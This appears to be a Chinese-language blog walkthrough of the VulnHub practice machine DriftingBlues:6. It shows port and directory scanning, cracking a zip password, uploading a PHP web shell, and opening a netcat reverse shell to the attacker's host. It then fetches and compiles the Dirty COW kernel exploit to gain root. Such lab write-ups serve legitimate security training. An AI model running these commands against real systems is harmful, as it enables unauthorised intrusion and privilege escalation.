DRIFTINGBLUES:6

2712

DRIFTINGBLUES: 6靶机介绍下载地址:https://download.vulnhub.com/driftingblues/driftingblues6_vh.ova难度:Easy运行环境:VirtualBox

攻击主机:kali 2021

目标主机:DRIFTINGBLUES: 6

打靶开始1.主机发现

使用ARP扫描可以快速的发现当前网段所有的开启主机

DRIFTINGBLUES:6

2.端口扫描

还是老套路

代码语言:JavaScript代码运行次数:0运行复制

nmap -sV -sC -p- 192.168.0.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 02:06 EDTNmap scan report for 192.168.0.104Host is up (0.0019s latency).Not shown: 65534 closed portsPORT   STATE SERVICE VERSION80/tcp open  http    apache httpd 2.2.22 ((Debian))| http-robots.txt: 1 disallowed entry |_/textpattern/textpattern|_http-server-header: Apache/2.2.22 (Debian)|_http-title: driftingblues
DRIFTINGBLUES:6

3.信息收集

使用浏览器访问目标WEb站点,得到了一串提示

代码语言:javascript代码运行次数:0运行复制

User-agent: *Disallow: /textpattern/textpatterndont forget to add .zip extension to your dir-brute;)

访问该路径得到一个登录地址,另一段提示应该是一个zip文件,应该保存了一些密码之类的····

使用dirb工具进行爆破

代码语言:javascript代码运行次数:0运行复制

dirb http://192.168.0.104/ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -X .zip
DRIFTINGBLUES:6

再次进行目录爆破,我比较习惯用dirsearch

代码语言:javascript代码运行次数:0运行复制

┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/ -i 200[02:36:29] 200 -   52KB - /db[02:36:30] 200 -  750B  - /index[02:36:30] 200 -  750B  - /index.html[02:36:33] 200 -  110B  - /robots.txt[02:36:35] 200 -   12KB - /textpattern/-----------------------------------------------------┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/textpattern/textpattern/ -i 200[02:45:38] 200 -    0B  - /textpattern/textpattern/config.php[02:45:40] 200 -    5KB - /textpattern/textpattern/include/[02:45:40] 200 -    4KB - /textpattern/textpattern/index.php[02:45:40] 200 -    4KB - /textpattern/textpattern/index.php/login/[02:45:41] 200 -    6KB - /textpattern/textpattern/lib/[02:45:43] 200 -  784B  - /textpattern/textpattern/plugins/[02:45:43] 200 -    2KB - /textpattern/textpattern/publish/[02:45:44] 200 -    3KB - /textpattern/textpattern/setup/[02:45:45] 200 -  776B  - /textpattern/textpattern/tmp/[02:45:46] 200 -    2KB - /textpattern/textpattern/vendors/-----------------------------------------------------┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/textpattern/ -i 200[02:46:59] 200 -   66KB - /textpattern/HISTORY[02:46:59] 200 -   66KB - /textpattern/HISTORY.txt[02:46:59] 200 -   15KB - /textpattern/LICENSE.txt[02:47:00] 200 -   15KB - /textpattern/LICENSE[02:47:00] 200 -    6KB - /textpattern/README[02:47:00] 200 -    6KB - /textpattern/README.txt[02:47:04] 200 -    0B  - /textpattern/css.php[02:47:05] 200 -  944B  - /textpattern/files/[02:47:06] 200 -  746B  - /textpattern/images/[02:47:06] 200 -   12KB - /textpattern/index.php[02:47:10] 200 -    4KB - /textpattern/textpattern/[02:47:10] 200 -  746B  - /textpattern/themes/

4.离线口令爆破代码语言:javascript代码运行次数:0运行复制

┌──(yifang㉿yifang)-[~]└─$ zip2john spammer.zip > passwd  #先生成zip的哈希散列ver 2.0 spammer.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D┌──(yifang㉿yifang)-[~]└─$ john passwd --show #注意这里需要加一个showspammer.zip/creds.txt:myspace4:creds.txt:spammer.zip::spammer.zip1 password hash cracked, 0 left┌──(yifang㉿yifang)-[~]└─$ unzip spammer.zip  #进行zip解压Archive:  spammer.zip[spammer.zip] creds.txt password:  extracting: creds.txt               ┌──(yifang㉿yifang)-[~]└─$ cat creds.txt mayer:lionheart---------------------------------账户:mayer密码:lionheart

5.文件上传Getshell

登录后台,进入【Content】->【Files】下,进行文件上传,令人兴奋的是,这里可以上传任何文件,

而路径就在http://192.168.0.104/textpattern/files/shell.php

DRIFTINGBLUES:6

蚁剑连接成功

DRIFTINGBLUES:6

6.后渗透提权

首先进行nc转移shell,目标的nc似乎存在-e的功能

代码语言:javascript代码运行次数:0运行复制

目标主机:nc -e /bin/shell 192.168.0.103 4444kali:nc -lvp 4444
DRIFTINGBLUES:6

在尝试了两种提权方式 sudoers SUID 并没有找到有用的文件,尝试使用 脏牛 进行提权操作

代码语言:javascript代码运行次数:0运行复制

kalicp /usr/share/exploitdb/exploits/linux/local/40839.c .python3 -m http.server-----------------------------------------------目标主机:python -c 'import pty; pty.spawn("/bin/bash")'cd /tmpwget http://192.168.0.103:8000/40839.cgcc -pthread 40839.c -o dirty -lcrypt./dirty-----------------重新连接ncshellpython -c 'import pty; pty.spawn("/bin/bash")'su firefartidcat /root/flag.txt
DRIFTINGBLUES:6
DRIFTINGBLUES:6

打靶结束

作者:yifang

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
互联网运维
# 工具# linux# php# http# JavaScript# python# 浏览器# red# css# https# apache# b站
喜欢就支持一下吧
点赞12 分享
站长的头像-小浪学习网
如何使用 Navicat 在达梦数据库中创建表-小浪学习网
如何使用 Navicat 在达梦数据库中创建表
如何使用 Navicat 在达梦数据库中创建表
3个月前 115
2025蝴蝶号投流实战课,账号规划到计划优化,三阶段精准投放策略-小浪学习网
2025蝴蝶号投流实战课,账号规划到计划优化,三阶段精准投放策略
2025蝴蝶号投流实战课,账号规划到计划优化,三阶段精准投放策略
34天前 98
周公子·主力密码(更新6月)-小浪学习网
周公子·主力密码(更新6月)
周公子·主力密码(更新6月)
34天前 98
主力密码股票课程,解析千万级资金流向,精准捕捉买卖时机指南(6月更新-小浪学习网
主力密码股票课程,解析千万级资金流向,精准捕捉买卖时机指南(6月更新
主力密码股票课程,解析千万级资金流向,精准捕捉买卖时机指南(6月更...
34天前 97
短视频爆款技术合集,热门视频制作全流程,电影级特效实战教程-小浪学习网
短视频爆款技术合集,热门视频制作全流程,电影级特效实战教程
短视频爆款技术合集,热门视频制作全流程,电影级特效实战教程
34天前 95
小红书截流同行客源,独家野路子获客玩法 日引200+暴力获客【揭秘】-小浪学习网
小红书截流同行客源,独家野路子获客玩法 日引200+暴力获客【揭秘】
小红书截流同行客源,独家野路子获客玩法 日引200+暴力获客【揭秘】
34天前 88
相关推荐
PHPCMS 多语言版本切换功能如何配置?-小浪学习网
PHPCMS 多语言版本切换功能如何配置?
PHPCMS 多语言版本切换功能如何配置?
1个月前 79
layui 表格怎么设置单元格对齐方式-小浪学习网
layui 表格怎么设置单元格对齐方式
layui 表格怎么设置单元格对齐方式
1个月前 73
(14423期)蛋仔派对偏门玩法,日入3000+,手机操作-小浪学习网
(14423期)蛋仔派对偏门玩法,日入3000+,手机操作
(14423期)蛋仔派对偏门玩法,日入3000+,手机操作
2个月前 62
Flutter能兼容Debian系统吗-小浪学习网
Flutter能兼容Debian系统吗
Flutter能兼容Debian系统吗
2个月前 59
如何排查和解决Vue项目中的“Cannot read properties of undefined (reading ‘Vue’)”报错?-小浪学习网
如何排查和解决Vue项目中的“Cannot read properties of undefined (reading ‘Vue’)”报错?
如何排查和解决Vue项目中的“Cannot read properties of undefined (reading ‘Vue’)...
4个月前 57
java反序列化引发的远程代码执行漏洞原理分析-小浪学习网
java反序列化引发的远程代码执行漏洞原理分析
java反序列化引发的远程代码执行漏洞原理分析
2年前 56
默认头像
标题
标题
鼠标事件黑神话:悟空鸿蒙魔术常量魔兽世界高效开发高德地图高可用架构高可扩展性验证码生成驱动更新驱动安装风格字符串预处理器音频编辑音乐创作面向对象静态定位静态多态性隐藏文件夹
如何使用 Navicat 在达梦数据库中创建表-小浪学习网
115人已阅读
如何使用 Navicat 在达梦数据库中创建表
TOP1
2025蝴蝶号投流实战课,账号规划到计划优化,三阶段精准投放策略-小浪学习网
2025蝴蝶号投流实战课,账号规划到计划优化,三阶段精准投放策略
34天前98人已阅读
TOP2
周公子·主力密码(更新6月)-小浪学习网
周公子·主力密码(更新6月)
34天前98人已阅读
TOP3
主力密码股票课程,解析千万级资金流向,精准捕捉买卖时机指南(6月更新-小浪学习网
主力密码股票课程,解析千万级资金流向,精准捕捉买卖时机指南(6月更新
34天前97人已阅读
TOP4
短视频爆款技术合集,热门视频制作全流程,电影级特效实战教程-小浪学习网
短视频爆款技术合集,热门视频制作全流程,电影级特效实战教程
34天前95人已阅读
TOP5